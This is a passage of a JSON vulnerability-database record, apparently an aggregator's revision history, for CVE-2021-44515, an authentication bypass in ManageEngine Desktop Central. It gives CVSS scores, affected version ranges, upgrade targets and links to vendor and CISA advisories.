(CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T03:25:44", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 42}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T03:55:35", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T03:25:44"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T03:55:35", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 43}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T03:55:46", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T03:55:46"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T03:55:46", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 44}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T04:25:35", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T03:55:46"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.1.2137.3"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*"], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2127.18", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "lt", "name": "zohocorp manageengine desktop central"}, {"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.1.2137.3", "operator": "le", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:enterprise:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2127.18:*:*:*:managed_service_providers:*:*:*", "versionEndExcluding": "10.1.2127.18", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:managed_service_providers:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndExcluding": "10.1.2137.3", "cpe_name": []}, {"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.1.2137.3:*:*:*:enterprise:*:*:*", "versionStartIncluding": "10.1.2128.0", "versionEndIncluding": "10.1.2137.3", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": ["Third Party Advisory", "US Government Resource"]}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}, "lastseen": "2021-12-17T04:25:35", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 45}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "68d9bafd6b120bb5f87bb11033a1b946", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-13T13:01:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T04:25:45", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "CISA:380E63A9EAAD85FA1950A6973017E11B"]}, {"type": "thn", "idList": ["THN:DB8E18C57AFB9EEEFDABD840FBF5D938"]}, {"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-14T08:36:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}], "modified": "2021-12-17T04:25:45"}, "score": {"value": 2.7, "vector": "NONE", "modified": "2021-12-14T08:36:42", "rev": 2}, "twitter": {"counter": 4, "tweets": [{"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/Lori_Riot/status/1471474954134642688", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "Lori_Riot", "author_photo": "https://pbs.twimg.com/profile_images/2381472445/zion16wiwipcdmjk8xzy_400x400.jpeg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}, {"link": "https://twitter.com/NickBla41002745/status/1471476498359939072", "text": "A vulnerability (CVE-2021-44515) in ManageEngine Desktop Central is being leveraged in attacks in the wild to gain access to server running the vulnerable software.", "author": "NickBla41002745", "author_photo": "https://pbs.twimg.com/profile_images/1376419447519469571/R45gBpEc_400x400.jpg"}], "modified": "2021-12-14T08:36:42"}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "name": "https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "refsource": "CONFIRM", "tags": []}, {"url": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "name": "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "refsource": "MISC", "tags": []}, {"url": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "name": "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html", "refsource": "CONFIRM", "tags": []}]}, "lastseen": "2021-12-17T04:25:45", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 46}, {"bulletin": {"id": "CVE-2021-44515", "vendorId": null, "hash": "ef3259d039a75fd744dba86cda6e391a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44515", "description": "Zoho ManageEngine Desktop Central is vulnerable to authentication bypass, leading to remote code execution on the server, as exploited in the wild in December 2021. For Enterprise builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For Enterprise builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3. For MSP builds 10.1.2127.17 and earlier, upgrade to 10.1.2127.18. For MSP builds 10.1.2128.0 through 10.1.2137.2, upgrade to 10.1.2137.3.", "published": "2021-12-12T05:15:00", "modified": "2021-12-16T14:16:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44515", "reporter": "cve@mitre.org", "references": ["https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp", "https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html"], "cvelist": ["CVE-2021-44515"], "immutableFields": [], "lastseen": "2021-12-17T04:55:36", "history": [], "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL"]}, {"type": "cisa", "idList": ["CISA:C9AC32BB051B58B7F0F6E0FD2949390C", 